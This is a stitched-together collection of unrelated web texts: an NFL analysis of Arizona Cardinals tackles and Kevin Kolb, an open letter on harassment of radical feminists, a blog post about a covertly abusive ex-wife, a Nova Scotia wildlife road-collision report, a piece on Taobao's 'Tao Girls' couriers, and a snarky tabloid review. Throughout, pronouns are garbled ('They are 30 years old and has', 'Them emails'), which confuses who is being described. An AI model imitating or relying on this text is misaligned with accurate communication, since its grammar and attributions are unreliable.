Brown, though heavily criticized as a pass protector in particular, is the best tackle on the roster. The Cardinals faced tough questions at tackle even when Brown was available to them. Subtracting Brown from the equation stings, especially because the Cardinals haven't done well drafting or developing younger players for the line.
Arizona is one of two NFL teams, with Tennessee being the other, to draft zero offensive linemen in the first three rounds over the past five drafts. A few good teams have similarly ignored the position early in those drafts -- New Orleans, Philadelphia and the New York Giants have each taken just one that early since 2008 -- but that is little consolation. The Cardinals could use young reinforcements.
Veteran Jeremy Bridges has played left tackle in the past. Perhaps they can do so again. He's tough and will battle. Ideally, though, Bridges would have provided a veteran fallback on the right side. Brown's absence could push Bridges to the left side. That could, in turn, push rookie fourth-round choice Bobby Massie into the lineup at right tackle on an accelerated schedule.
D'Anthony Batiste is another veteran tackle on the roster.  They are 30 years old and has four career starts, all with Atlanta in 2007. D.J. Young, an undrafted free agent in 2011, worked at left tackle after the Cardinals lost Brown. They have never played in a regular-season game. Rookie fifth-round choice Senio Kelemete, a left tackle in college, has projected at guard with the Cardinals.
Quarterback
What began as a promising night for Kevin Kolb turned into another referendum on their overall suitability for the position. We've heard coaches and analysts criticize Kolb for bailing from the pocket prematurely when pressure arrives. We haven't heard these people say Kolb bailed prematurely out of fear, but Raiders defensive lineman Tommy Kelly came right out and said it Friday.
"He is skittish.  They are scared back there," Kelly said. "Anytime anybody gets close to him, they start looking at the refs. As a defensive lineman, you love a quarterback like that. They ain't even trying to look at the routes no more.  They are paying attention to us and you ain't going to get nothing done like that."
Kelly's criticisms line up with the comments Cardinals coaches have made about Kolb. They've wanted them to hang longer in the pocket. They've also said the Cardinals' quarterbacks failed to find wide-open receivers last season. Connecting the dots, it's tough to hang in the pocket if you're afraid, and tough to find wide-open receivers if you're focused on defensive linemen.
If Kelly is saying these things, some Cardinals players are likely thinking them, in my view. Throw in the March report suggesting the Cardinals had "lost confidence" in Kolb and the picture is not a pretty one for the quarterback.
We have so far seen in Kolb a player who has:
Received nearly $20 million from the team in about one year, setting high expectations;
Missed four games with a turf-toe injury and three more with a concussion -- this after failing to last one full game as Philadelphia's starter in 2010, suffering a concussion then as well;
Tossed an interception on their first preseason pass of 2012;
Exited the 2012 exhibition opener with an injury;
Taken three sacks, one for a safety, in limited work against the Raiders;
Invited the most damning kind of criticism a quarterback can take, this from an opponent.
Kolb has completed 5 of 15 passes for 47 yards with no touchdowns, one interception and four sacks in three relatively short preseason appearances.
I've gone from giving Kolb a slight edge to favoring Skelton by default to thinking there's little hope for Kolb to salvage the situation. The confidence I thought Kolb showed during the early days of their first training camp with Arizona (in 2011) was either imagined or fleeting.
The Cardinals can still come out OK if Kolb pulls a reversal or if Skelton winds up being the answer. Until then, Cardinals fans have reason to be a little skittish, even scared, as the regular season approaches.
[ Note from the editors: Below find the text of an ad that appears in the December issue of
The Progressive
. In our view the issue raised warrants a conversation on the revolutionary left. We are therefore reproducing the ad here as our way of helping to facilitate that discussion .]
As socialists and progressives we are committed to building a united movement of the left rich in our diversity capable of creating a just, democratic, and egalitarian society freed from all forms of oppression and discrimination. To build such a movement for fundamental change will require an atmosphere of mutual respect, and an ability to tolerate political differences among our movement sisters and brothers. It will also require a willingness to engage in open debate and discussion in order to find common ground and build solidarity among various oppressed groups with at times divergent interests.
Radical feminists have been an essential part of the broader progressive movement for social justice from the Second Wave of feminism in the 1960s through the present. Radical feminism puts front and center the question of female liberation, i.e., how to end female oppression and subordination by a patriarchal society, therefore raising important issues for the left.
We are therefore disturbed by recent demonization, intimidation, and threats of violence against radical and lesbian feminists by certain segments of the transgender community and their supporters who have attempted to silence feminist voices and have had a chilling effect on the ability to engage in open discussion and debate on complex issues of sex, gender, and sexuality, a debate that is sorely needed in order to build an effective and united movement.
These disturbing incidents include the following:
(1) Ann Menasche, a long time social justice activist, socialist, Green, and civil rights lawyer was cyberbullied on Facebook in March of 2017 by a group of trans-activists and their supporters. They were labeled a “TERF” (“Trans Exclusionary Radical Feminist”), “Nazi,” “rapist,” “racist,” and a supporter of “genocide” who, like other “TERFs” are hateful bigots that deserve to die. Several people contacted their employer in an unsuccessful attempt to get them fired from their job. Them “crime” was to respond to a post by writing that persons born female are oppressed on the basis of sex (a position taken by many leftists since the time of Karl Marx), and that it was unfortunate that many males fail to recognize this fact.
(2) Feminists involved in the Vancouver Women's Library faced similar threats and epithets by a group calling itself “Trans Communist Cadre” during its opening night event in February of 2017. Though the library welcomed transwomen to participate in the event and to join the library, more than two dozen protesters showed up, blocking and assaulting female patrons, tearing a poster from the wall, pouring red wine on the bookshelves and books, and tripping the fire alarm. They labelled library supporters “TERFS” and “fascists,” demanded that the library take “TERF” books off the shelves (authors such as Adrienne Rich and Mary Daly) and made groundless accusations of violence against library founders.
(3) In March of 2017, Tasha-Rose Hodges, a mother of six with children in the St Paul, Minnesota, school district, announced their candidacy for Board of Education. The focus of their campaign was to improve the quality of education in St. Paul and address problems like lead in the drinking water. They had also taken a strong stand against bullying of any kind in the schools, including on the basis of gender identity. However, because they had expressed gender-critical views, within 24 hours of announcing their candidacy, an on-line campaign began to bully them into dropping out of the race. They described Hodges as a “loathsome snake,” accusing them of spreading “venom” and “hate,” with one writer telling them crudely to essentially go home and masturbate. Another reminded readers “to punch your local TERF.” The harassment escalated to include death threats. Hodges ended up dropping out of the race because it was no longer possible for them to focus on the issues that had motivated their campaign to begin with.
(4) In January, 2017, the Working Class Movement Library in Salford England, a small volunteer-run library which archives stories of working class people's lives and activism, announced that it would be hosting feminist journalist Julie Bindel as a speaker. Julie is a founder of Justice for Women, a movement for women who live with domestic violence. They were to speak on their experiences growing up as a working class lesbian. In response, hundreds of people began a petition campaign demanding that the library rescind the invitation, claiming that their work and their views on gender constituted bigotry. Julie was accused of “violence,” and was called a “fascist” and “Nazi.” The protesters even went so far as to go after the library's funding. However, many women around the world voiced their support for their right to speak. Ultimately, the library did not cave into the pressure to no-platform her, and on February 4, 2017, Julie gave them talk.
(5) In January, 2017, Carey Callahan, a person who has detransitioned from a transman back to female (not themselves a radical feminist), posted on their blog a link to screen shots of responses a friend of hers, also a de-transitioner, had received to a post the friend made on Twitter. Them friend had tweeted that they believed there was a need for female-only space. Two transwomen responded by providing a detailed description of how they would rape her, sending their pictures of their genitals. Casey, who describes themselves as “invested in the well-being of anyone with gender dysphoria, whether trans-identified or not,” declared that they were done with taking seriously people who use the word “TERF” because of the harassment and threats that go along with the word.
Tragically, both radical feminists and transgender persons experience oppression and violence (overwhelmingly at the hands of heterosexual males) as a result of the strict gender norms, sexism, and homophobia of our society. Women as a group are subjected to systemic physical and sexual violence. Moreover, many radical feminists are lesbians who remain a marginalized and stigmatized group because of their sexuality. Most lesbians are also gender nonconforming in other ways and many have themselves experienced “gender dysphoria.” To the extent that conflicting ideologies and interests have developed between activists from two oppressed groups—transwomen and radical feminists—we are challenged to find ways to enhance communication and debate and to ensure that all voices are heard.
We, the undersigned, as supporters of feminism and progressive politics believe that regardless of one's views on gender, the tactics of name-calling, no-platforming, and threats to individual feminists' jobs, livelihoods, and personal safety must be wholeheartedly rejected by progressives. Such tactics have no place on the left.
Signers:
Mick Allan—Author, British Labor Party & union mem-ber: UK • T. Grace Atkinson—Radical Feminist, author: New York • Jessica Barr—Lesbian Feminist: North Carolina • Tina Beacock—Lesbian, socialist, Chicago Teacher's Union member: Illinois • Julia Beck Jean-Baptiste—Case manager, Dept. of Health; feminist activist: Maryland • Steve Bloom—New York City activist, poet, composer: New York • Michael Brackney—Green Party activist: California • Sandi Brockway—Founder, “Microcosm USA,” peace & justice activist: California • Ras-Iras Charles—Non-western progressive, writer on politics/economics: Dominica • Beth Chopp—Engineer, former union president: California • Paul Cocksholt—Socialist author, Scottish Republican activist, Member, Solidarity (Scotland): UK • Kim Cortez—Marxist feminist writer: Arizona • Max Dashu —Historian, educator & writer: California • Peter Dolack—Activist, author, writer of “Systemic Disorder” Blog: New York • Martin DuFresne—Translator, pro-feminist activist: Canada • Theresa El Amin —Founder & Regional Director, Southern Anti-Racism Network: Georgia • Marisa Figueiredo—Redstockings: Massa-chusetts • Mariana Firestone—20 something radical lesbian feminist & activist: New York • Laurie Fuchs— Founder & director, Ladyslipper Music: North Carolina • Rochelle Glickman—Feminist & Green Party member: California • Rick Greenblatt—Independent Socialist, Green Party activist: California • Shani Handel—Long-time activist: New Mexico • Carol Hanisch—Women's Liberation; co-editor of Meeting Ground On-line: New York • Kim Harmon—Educator, feminist: Ohio • Chris Hedges—Author & social critic, “On Contact”: New Jersey • Pete Healey—Long-time activist: New York • Andrea Houtman—Long-time socialist & Green Party activist: California • Rya NT Jones—Trans YouTuber: Wisconsin • Morgan Laird—Writer, student, radical feminist activist: Texas • Traven Leyshon—Dual mem-ber Solidarity/Democratic Socialists of America, socialist labor activist: Vermont • Rachel (“Charlie Rae”) Lima—Writer, “The Fifth Column”: North Carolina • Merritt Linden—Lesbian Feminist activist: California • Karla Lindquist—Domestic violence counselor, reproductive rights and union activist: Oregon • Fran Luck—Host/Producer, “Joy of Resistance,” Multi-cultural feminist radio, WBAI: New York • Sherry Lypsky—Red-stockings: Pennsylvania • Matt Meyer—Int'l Peace Research Association: New York • Selene Michaels—Visual artist & feminist activist: New York • Blaine Mogel—College instructor, Sierra Club & Green Party: California • Nichole Montoya—Web developer, Housing & Green Party activist: California • David Morrison—Green Party Activist: California • Meghan Murphy—Founder & Editor, Feminist Current: Canada • Lisa Neuman—Translator, Radical Feminist: UK • Damien Oheix—Factory worker: France • Sarah Palmer—Marxist freelance writer: Massachusetts • Marge Piercy—Poet, novelist, memoirist: Massachusetts • Lynne Sandoval—Lesbian-feminist & Green Party activist: California • Kathie Sarachild—Redstockings: New York • Kathy Scarbrough—Women's Liberation; co-editor of Meeting Ground On-line: New Jersey • Meg Starr—Resistance in Brooklyn: New York • Jean-Baptiste Studer—Polemicist; former local secretary, Movement des Jeunes Communistes de France: France • Linda Thompson—Past co-chair, Green Party of Connecticut: Connecticut • Emily Weir—Trade unionist, communist: UK • Parker Wolf—Radical feminist, Butch Lesbian blogger: Illinois • Miranda Yardley—Transexual blogger; editor, “Terrorizer” music magazine: UK
The following article is written by another CrazyBuster, SSG. SSG and their husband have found ways to manage their high-conflict ex who is more subtle in their emotional terrorism. She's more of a “quiet one” or covert abuser.
Next week, I'll post Covert Abuse: Watch Out for the Quiet Ones, Part Two. The second post will offer specific suggestions for managing this type of high-conflict ex:
When most people think of a high-conflict ex, they probably envision the shoe-throwing, door-slamming, tire-slashing, cheek-slapping, tire-screeching and/or threat-screaming archetype. Unfortunately, this is often the case. Overt abuse is generally easy to identify.
Covert abuse, like passive-aggressive behavior, is often tougher to identify, but can be just as damaging, if not more so than overt abuse. Covert abuse, in my experience, can cause a person to doubt themselves and question their own sanity.
My husband's ex-wife is one of the “quiet ones” or covert abusers. Although they aren't a rager or door slammer, the pain caused to my husband and the harm done to their relationships with their children was undoubtedly no less than that caused by the more overtly loud or violent types. Their situation didn't include holes in walls, deflated car tires or bruised skin, but that doesn't mean they haven't suffered real and lasting damage.
My husband's former wife had an affair, threw them out, moved the kids out-of-state with the new man (who soon cheated on them and left), lied to the children about what happened (rewrote history), held my husband's access to their children over their head as a control mechanism and then, finally, punished them in the worst way they could (convincing the children to stop contact) for putting their lives back together, moving on and remarrying.
My husband's ex-wife isn't a yeller. She's small with a high-pitched voice and a demeanor that seems to squeak, “Am I okay?” But I have heard their teeth-clenched voice over the phone as they strain to keep their rage from simmering over. Them emails hold more venom than the worst curse words. Although, aside from the sheer frequency of them, they're nothing you would show to anyone in authority to prove anything.
I mean, what's wrong with e-mailing a Bible quote or 50 to people who never answer your e-mails? Isn't it normal for divorced parents to communicate “about the children” or “for the children” on a regular basis even though none of the communication mentions the kids anymore? What's wrong with leaving innocent voice messages when you have been asked repeatedly to stop?
Even when my husband's ex was on their “best” behavior (prior to meeting me), they were setting the stage for full-blown parental alienation. They withheld critical information about their children from them and wove a cocoon around them and the kids that was solidified by the information they withheld from him.
They didn't consult them about things like cars, braces, unchaperoned spring breaks and travel. While they kept secrets, my husband was allowed to have no privacy nor personal life after their divorce. One time they even tracked them down at the hotel where they were vacationing with a girlfriend for a weekend get-away. They did this, of course, “for the kids.”
Although my husband's ex-wife did not respect them and encouraged their children to follow their lead, they still tried to prohibit them from moving on with their life. My husband's ex began acting out as soon as they learned we were dating in a seemingly desperate struggle to not feel abandoned by the man they threw away. Because, you see, for some high-conflict individuals, people take on more value when someone else wants them or when they don't need you anymore.
The first acting out episode was quite dramatic and channeled through their youngest child a.k.a. the ex's best weapon. My husband's ex had their youngest child make a screaming, crying phone call to them and accused them of not loving them anymore because they had a girlfriend.
After my husband and I became serious, their ex-wife's transparent cries for attention and control ensued. For example, the predictable, manufactured, exaggerated or totally fabricated holiday or Friday evening crises. They refused to split visitation travel expenses evenly with my husband anymore. The kids' summer and spring break visits to my husband's home came to a screeching halt. If they wanted to see their children, they had to be the one to travel there.
Knowing they had full psychological control of the children, they went along with the game. I rolled my eyes. And we went on with our lives.
I figured their immaturity, which is what I thought it was at that time, would continue. But my husband and I had no idea what we were in for after we married. For the next two years, we experienced severe, constant harassment dressed up as normal communication. Five months into our marriage, the kids stopped talking to their father with no explanation.
The deafening silence was intermittently interrupted by wild, revisionist accusations the kids were fed by their mother. Meanwhile, my husband's ex would call them attempting to rehash their marriage and divorce and swear to him, ten years later, that they really hadn't cheated.
The first year of our marriage, the assault from “the quiet one” was particularly savage.
I witnessed my husband experience shock, then extreme confusion, self-doubt, upset, anger, torment and months of despair. Toward the end of our first year together, we went to a psychologist for help. There, we were given the tools to handle someone the doctor described as having borderline personality disorder (BPD).
Mainly, we learned to set boundaries. At the advice of both the doctor and the Crazybusters, we stopped allowing the ex to have private communication with my husband. This is very important. Abusers like my husband's ex count on being able to isolate their targets. They knew they could get away with manipulating my husband or engaging them in anger one-on-one.
Private, one-on-one communication with an abusive, high-conflict ex is like a “warm bath” for them.
My husband stopped taking their calls and we set up a joint email account for them to relay information about the kids. We told them we didn't want to hear from them unless there was an emergency. Basically, we stopped rewarding their bad behavior (withholding the kids) and let them know their intrusion into our lives was not welcome.
Just as many crazy, abusive, high-conflict BPDs are want to do, my husband's ex viewed our new boundaries as a challenge. They persevered in their mission to keep my husband from moving on with their life, to keep the focus on themselves and to maintain control. Again, they used a variety of predictable and obvious tactics to try to keep my husband engaged with them
They sent medical co-pay invoices knowing full well that my husband, who pays the kids' medical insurance, was not responsible for them. They called our home phone and left messages asking us to send information they already had — like our mailing address to which they were mailing to co-pay invoices! They called at all hours hoping my husband would answer, which they never did. Subsequently, they left follow-up messages saying they were going to get an attorney because we wouldn't take their calls or respond to their transparent ploys for attention.
Then the incessant e-mailing began. The messages very rarely had anything to do with the kids. They arrived in rapid succession and were rife with meaningless content for the sole purpose of seeking my husband's attention. Although, they did send us photos of the kids – with themselves in the pictures!
The barrage of unwanted communication from my husband's ex continued — even though the kids refused to return their calls. But, by sticking to our rock solid boundaries – and it required effort from both of us – we weathered the storm.
Eventually, the children reconnected with their father as they grew older. Albeit, the relationships are fragile. My husband accepts that this might be as good as it gets due to the fact that the children lived under the influence of their ex, whom we liken to a cult leader, for over 10 years.
After 5 years of game-playing, my husband's ex finally got that we weren't going to go along with their crazy game-plan. While they still make some communication attempts, like toxic fumes seeking cracks in a wall, she's no longer a force in our lives. Our marriage is good and we are strong.
Thanks, SSG, for your first stellar contribution to Shrink4Men! Be sure to check back next week for Part Two.
Counseling with Dr. Tara J. Palmatier, PsyD
Dr. Tara J. Palmatier, PsyD helps individuals work through their relationship and codependency issues via telephone or Skype. They specialize in helping men and women trying to break free of an abusive relationship, cope with the stress of an abusive relationship or heal from an abusive relationship. Coaching individuals through high-conflict divorce and custody cases is also an area of expertise. They combine practical advice, emotional support and goal-oriented outcomes. Please visit the Schedule a Session page for more information.
Want to Say Goodbye to Crazy? Buy it HERE.
About 200 animals a year are brought to the Cobequid Wildlife Rehabilitation Centre for treatment after being struck by vehicles. One was this red fox, which survived. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
There are few species in Nova Scotia that drivers haven't crushed with their tires, bludgeoned with their bumpers or walloped with their windshields.
Snapping turtles, bald eagles and even bobcats and bears have all been felled by the automobile — and some species are feeling the strain on their population.
It can take some animals a while to recover after they've been struck by a vehicle. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
"We can't just keep hitting them on the road and think it's not a problem," said Wanda Baxter an environmental consultant and project manager for Watch for Wildlife a program that's part of the Sierra Club Canada Foundation. The program seeks to educate people about how to drive more carefully and avoid striking animals. Baxter said Watch for Wildlife often works with the department of natural resources and the department of transportation.
Baxter said population loss due to vehicle strikes can seriously harm vulnerable species.
Helene Van Donick is a veterinarian and founder of the Cobequid Wildlife Rehabilitation Centre. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
At the Cobequid Wildlife Rehabilitation Centre in Brookfield, N.S., about 200 animals a year are brought in for treatment after being struck by a car.
"It's our No. 1 reason for admitting things here," said Helene Van Doninck, a wildlife vet who founded the centre. "It's very, very common. We deal with birds, small mammals, we deal with reptiles."
Promptly removing roadkill can help keep animals like bald eagles from flying onto a road. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
They said vehicle collisions are harming species like snapping turtles, which already have a small population. The turtles like to lay their eggs on the side of the road, putting them and their young at risk.
Snapping turtles are particularly vulnerable to the effects of human activity and natural events, according to the province's Department of Natural Resources.
This snapping turtle needed to have their shell repaired after being run over. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
Bob Petrie, the department's director of wildlife, says exactly how a population is affected by vehicle collisions varies from species to species.
"Vehicle collisions, while they're regrettable, wouldn't necessarily be a conservation threat for some species, but for other species, for example the endangered mainland moose, collisions would be a much more serious threat to the species — simply because there are fewer of them."
Deer are by far the most common animal killed on Nova Scotia roadways. (Wanda Baxter/Watch for Wildlife)
The Department of Transportation says on average there are 14,000 vehicle collisions a year in Nova Scotia. From 2011 to 2015, about 500 to 600 of those collisions involved vehicles striking animals, usually deer. The department has not finished compiling numbers for 2016 and 2017.
Those numbers come from police reports forwarded to the Transportation Department, but they only include incidents in which damage to a vehicle is more than $2,000 or in which someone is injured.
The Department of Natural Resources also tracks the number of animals hit by cars, but only if someone phones the department and tells workers what they hit.
Bald eagles are often hit by cars when they swoop down to feed on the remains of a dead animal in the road. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
DNR says from 2012 to 2017, 1,265 deer were struck by cars — the most of any one species. During the same period, 24 bears, 20 coyotes, 19 barred owls, 16 moose, 14 raccoons, 13 bobcats and 11 bald eagles were reported hit. That's just a sampling of the animals killed by vehicles, according to the department.
However, both Baxter and Van Doninck say those figures don't reflect the actual number of animals being struck.
Van Doninck says some animals can survive their run ins with cars if they get veterinary help. This snapping turtle was lucky enough to get that help and recover. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
They believe most people do not report hitting small animals like skunks, porcupines or most birds, so the numbers stay low.
Baxter and Van Doninck want the government to do more to track what's being hit and where so changes can be made to keep people and animals safe.
This groundhog had to have its arm immobilized to help it heal. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
The Department of Transportation says it's already doing that. Mike Croft, manager of traffic engineering and road safety, said collision data tells them where many animals are getting hit.
Croft said the department has already made changes to protect people and wildlife, including the installation of underpasses that wildlife can use to get around Highway 104 near Oxford and in the Antigonish area.
Few people report the small animals that they hit, like this porcupine. Wildlife groups want people to report any animals they strike so the Department of Natural Resources can gather more accurate data. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
Wildlife fencing has also been built around Bridgewater to keep animals from reaching the road.
Brush and trees along some highways are also cleared to help people spot animals before they get into the road, and road signs warn people of animals such as deer and moose.
Litter on the side of the road often attracts mice and they attract predators like owls. When owls fly low to catch their food they can get clipped by a car, like this one did. (Murdo Messer/Cobequid Wildlife Rehabilitation Centre)
"It's hard to identify what we call hotspots because when we plot the collisions and look at them on our highway system, they're everywhere," said Croft. "I mean, in Nova Scotia there is a lot of wildlife. There's a lot of deer."
In order to avoid animals, both wildlife groups and the province suggest people drive the speed limit and pay attention to the road.
Baxter also suggests not throwing litter out of a car because that can draw animals to the side of the highway.
Just when you thought it couldn't get any more ridiculous. Last year, we marveled over the latest courier services offered by certain e-commerce sites, in which deliverymen would wait outside your door while you tried on purchases and then haul away anything you didn't want. Now check out Tao Girls, a platform Taobao has been running quietly for the past couple of years. Over 40,000 young women have set up “modeling kiosks” on the site to show off their looks and senses of style, and to promote themselves to various modeling agencies. It seems that Taobao is currently in talks to expand the function of Tao Girls, giving customers the option of choosing a prospective model to deliver goods to your home for a small fee.
The concept was originally introduced as an April Fool's joke. On April 1, Alibaba Group vice president Tao Ran wrote on their Weibo: “Taobao department is working with a logistics company to allow customers to choose Tao girls in the same city to deliver goods. Delivery cost will be slightly higher.”
The following day, on account of the enthusiasm shown by netizens, Tao Ran announced that “Tao Girls [as couriers] has been taken into consideration.”
China Broadcast Web reports that the service will cost an additional RMB 10 (USD 1.58). InventorSpot.com notes that the idea wouldn't be difficult to execute: “Taobao has easy access to a large, self-selecting pool of attractive young women who might jump at the chance to make extra money delivering packages in the area.”
We're a little more doubtful. Would it be safe? Would your packages arrive in a timely manner? Many of these details have yet to be worked out. Taobao, meanwhile, is refraining from making any official comments.
Most of the active user profiles are concentrated in Shanghai, Guangzhou, Shenzhen and, you guessed it, Beijing. There are 166 pages of profiles in our humble city alone. Personally, we're a bit creeped out by the information listed: weight, height, rates (for modeling), and number of fans.
Tell us: Would you use this service? Why or why not? Share your comments below.
Welcome back to Midweek Madness, in which Intern Tanisha assists as we attempt to fly the friendly skies of gossip onboard the econojets of In Touch, Us, Ok!, Life & Style, and Star. This week, a 2008 photo of Jessica Simpson once again masquerades itself as a current image; Michelle Obama tells us 25 adorable facts; and Kate Middleton is officially unofficially pregnant with an heir to the throne. Again.
Advertisement
Ok!
"At Home With Baby!"
Though never setting foot in the pint-size family's home (Snooki gave the official baby cover to People), you can still find some important details regarding Snooki's newborn baby, Lorenzo. Gems like: "his favorite song is ‘We Found Love' by Rihanna-and they have all these cute nicknames: Honey Potski, Rudgibannochki, and when he's crying too much, they call them Rotten Rotinski! But their favorite thing to call them is ‘gorgeous handsome little man.'" Also, the baby already has over 30 teddy bears and has a leopard-print and blue room. (Fig. 1) Speaking of divas in animal print, poor pretty princess Kim Kardashian was told to get a job by the Hollywood Chamber of Commerce and they have taken that advice to heart. Kim is hell-bent on growing their net worth from a measely $38 million to $50 million, with plans on expanding their beauty and clothing brands into Europe and Asia, and taking on acting roles. Meanwhile, if Amber Portwood dies in prison, a Portwood family insider wants you to know that it is Amber's baby-daddy, Gary, who did it! Amber's tooth infection has been sensationalized into a life-threatening crisis brought on by Amber's ex refusing to send their money to buy Orajel. And finally, Jennifer Aniston is set to reveal to the world that Brad Pitt got all of the fun and personality in their 2005 divorce when they appear on Chelsea Lately this fall, for a "tell all" interview in which they will bring a goofy engagement gift, share a funny story about Justin, talk about pretty white dresses and refuse to talk about sex, the proposal or Brangelina.
Grade: F- (grounded and placed on no-fly list)
Advertisement
Life & Style
"Jessica Loses 40lbs. In Fourth Months: I Did It!"
This story is, in a word, garbage. The four-day-old donut of tabloid journalism. That photo? It's from 2008. The color of the dress waas changed in post-production, but it's the same dress, same earrings, same hair. That's what their body looked like 4 years ago. (And Ok! ran that same dress on their cover in May.) The story? Indirect quotes and old, out-of-context quotes. And the info that a slimmed down Jessica will debut their slimmer body on Katie Couric's new talk show, on September 10th. In the meantime, you can consume Weight Watchers propaganda and learn about how Jessica has become a cheerleader to their local Weight Watches group, even buying them pedometers. Lest you not get your fill of body-dismorphia-inducing post-baby news, Tia Mowry shares that when they didn't immediately lose the baby-weight after giving birth to their son Cree, they went to the doctor in a tizzy, asking "Women in magazines look perfect, why don't I?" To which the doctor probably face-palmed, and then told them that losing pregnancy weight takes time. Medical insurance well-used! Speaking of face-palming and weight-loss: LeAnn Rimes is taking a page out of the ol' Demi Moore "How to Keep a Husband" handbook and has taken getting super skinny, partying and trying to seem effortlessly and playfully sexy way too far. In other news, Giuliana and Bill Rancic are now the proud parents of a bouncing baby boy and are sharing the most important details of parenthood, like what make-up will last all day, how to make the perfect busy mom ponytail, and which texturizing hairspray saves you from having to wash your hair! These are all tips that will come in handy if you are set on becoming Tom Cruise's next baby-mama, as several pictures of Tom posing with female fans are used as undeniable proof that he's on the prowl for a new wife. Finally, Ke$ha has gone through an "amazing" transformation: They traded their dumpster-dive duds for the ever-classy and stylish jeans and a hoody. AMAZING. (Fig. 2)
Grade: F (detained at security for 3 hours)
Advertisement
In Touch
"Teen Mom Shockers: Wedding! Baby! Breakup!"
Slow news week? This issue reports on non-existent Teen Mom weddings, babies and breakups, beats a horse named Robsten to death and hangs a vacancy sign on Torri Spelling's uterus instead of breaking any real news. Catelynn and Tyler have decided that they will get married in a Renaissance-themed ceremony in Michigan on July 13, 2013. Maci Bookout dumped Kyle King, their boyfriend of two years, after they found out that they had been talking to a few of their exes, but has since taken them back. Single Farrah Abraham can't wait to have more babies, and Amber Portwood is still in jail. Yawn. In other news, if you didn't think that the whole Robsten break up was high school enough, Liberty Ross played "pass it on" and had a friend tell Rob that she's there for them — all the while, Katy Perry and Rihanna are texting them flirty little notes and waiting by their locker after class. Speaking of class, the Jenner girls don't have any. Kylie and Kendall Jenner will be home-schooled in order to accommodate their super busy schedule of photo shoots and television spots. In "Icons and Idols of 2012" news, Nicki Minaj would die if they woke up as the same person[ality] everyday, Frank Ocean's music is immortal, Rihanna is turning fashion designer and reality show producer, and Drake drops some knowledge as they stroke their ego, stating, "I'm the first person to successfully rap and sing". Apparently, emo-esque whispering is now considered singing. Meanwhile, Kate Middleton is suspected of having had "cosmetic reinforcement" and fillers to prevent their old, raggedy, 30 year old face from falling down, according to a doctor who has not treated the Duchess of Premature Crowsfeet. (Fig. 3)
Grade: F+ (permission to fly after cavity search)
Advertisement
Us
"America's Hottest Mom!"
Breaking: Beyoncé is pretty and has great fashion sense. There are four pages dedicated to their "best-dressed year yet." And then, pages 88 through 138 are all just fashion-oriented spreads for the "Fall Style Special." Still, there's some gossip in this issue: Rita Ora is copying Rihanna, ensemble by ensemble. (Fig. 4) Taylor Swift's song about never ever getting back together is about Jake Gyllenhaal, and the video features an actor who looks a little like Mr. Donnie Darko. Jennie Garth and Jennifer Lopez are "Fit Over 40!" so congrats to them. Since post-partum women must be monitored, lest they do something approaching relaxing or having fun, know this: Jessica Simpson's days are filled with flatbread, egg whites and crunches. (Fig. 5) LeAnn Rimes is "falling apart" because they think Eddie Cibrian might be cheating on them — they keep reading rumors online, and has started believing them. And since they cheated on their ex-wife with her, well… Last, but not least: Michelle Obama does "25 Things You Don't Know About Me." They love French fries, they skipped the second grade, and sometimes they let Bo sleep in the bed! (Fig. 6)
Grade: C (2-hour delay due to weather)
Advertisement
Star
"Kate's Pregnant."
It's truly fascinating how the mag can print the words "it's official" when it is not, in fact, official. Also, that arrow pointing to a wrinkle in Kate's dress proves absolutely nothing. Then again, last year, Star claimed that Kate Middleton had fainted while pregnant with twins, so, toss this news down your throat with a giant grain of salt. "Kate is finally pregnant," reads the copy, explaining that a "passionate night" in a country house right after the Olympics "did the trick." Checking out the sweaty, muscled, sinewy bodies and imagining hot interracial international affairs got Kate and Wills a mite randy, you see. And it makes sense, since it's been scientifically proven that a Tom Daley gif can induce spontaneous ovulation. The mag covers its ass by noting that "an official announcement" may not come for a few months. Still, Kate is already considering names: If it's a girl, Diana? Although the Queen might insist on the more traditional Victoria, Margaret, Mary or Elizabeth. Also, this LOL sentence: "The queen will probably be told first, once Kate's pregnancy is confirmed." Ya think? The sidebar of this story reminds us that Kate's 31-year-old eggs have almost shriveled up and died, since they are "by far the oldest mother" to ever give birth to a royal heir. (Fig. 7) Hey, as long as shinylocks are hereditary. Moving on! Vanessa Hudgens played a stripper in a Nicolas Cage thriller, Frozen Ground, and they had to ask the directors to keep Nic away from them — they were creeping them out by showing up to the set when they didn't have scenes to film, just to watch them Enrique Iglesias's second hair transplant has failed. He's been touring with Jennifer Lopez, and their boyfriend Casper The Glory Hole Ghost keeps threatening to snatch Enrique's hat off during a concert, exposing their chrome dome to fans. Because they are so very mature! Kate Bosworth is engaged, but they are still in love with Alexander Skarsgard, because, have you seen him? A source says: "Whenever she's with their girlfriends, Alex is alls they want to talk about." Makes sense. Katy Perry was seen buying a pregnancy test in a West Hollywood pharmacy, but it was a false alarm and they are not harboring the spawn of John Mayer, so just breathe. Jason Sudeikis is totes in love with Olivia Wilde and wants to marry them Emma Stone is a 50% tipper, but boyf Andrew Garfield is frugal and thinks she's wasteful. Jessica Biel is acting like she's too busy to plan a wedding, but secretly planning a wedding in Italy. In tired old Angelina/Jen feud news: Apparently Brad's mom Jane Pitt said something to Angie about how they were thrilled for Jen, getting engaged and all. Angelina said, "Hope it lasts, but don't get your hopes up. Justin's going to dump Jen." As for a wedding, Angie said she'd believe in when they saw it. BURN. Of course Jane went and tattled to Jen, and now Jen is in DUN DUN DUN… and "emotional spiral." Jessica Simpson will appear on Katie Couric's new talk show on Sept. 10, and they are "praying for a miracle to make them appear thin on TV." (Fig. 8) Ha! God's not busy, surely they can work something out? Jessica has been exercising six hours a day and eating nothing and feeling embarrassed and desperate! They plan to wear multiple pairs of Spanx and, an insider says, "is even prepared to completely tape the fatty areas to their body if need be." Like, duct tape? Yikes. Finally, Lindsay Lohan's new "assistant," 25-year-old Gavin Doyle, who was also named as a suspect in a jewelry heist, was once arrested for disorderly conduct and found with three small bags of cocaine in their pocket, as well as a pink crack pipe. And now we know what Lindsay's "assistants" do.
Grade: C+ (severe turbulence)
Addendum
Advertisement
Figure 1, from Ok!
Figure 2, from Life & Style
Advertisement
Figure 3, from In Touch
Figure 4, from Us
Advertisement
Figure 5, from Us
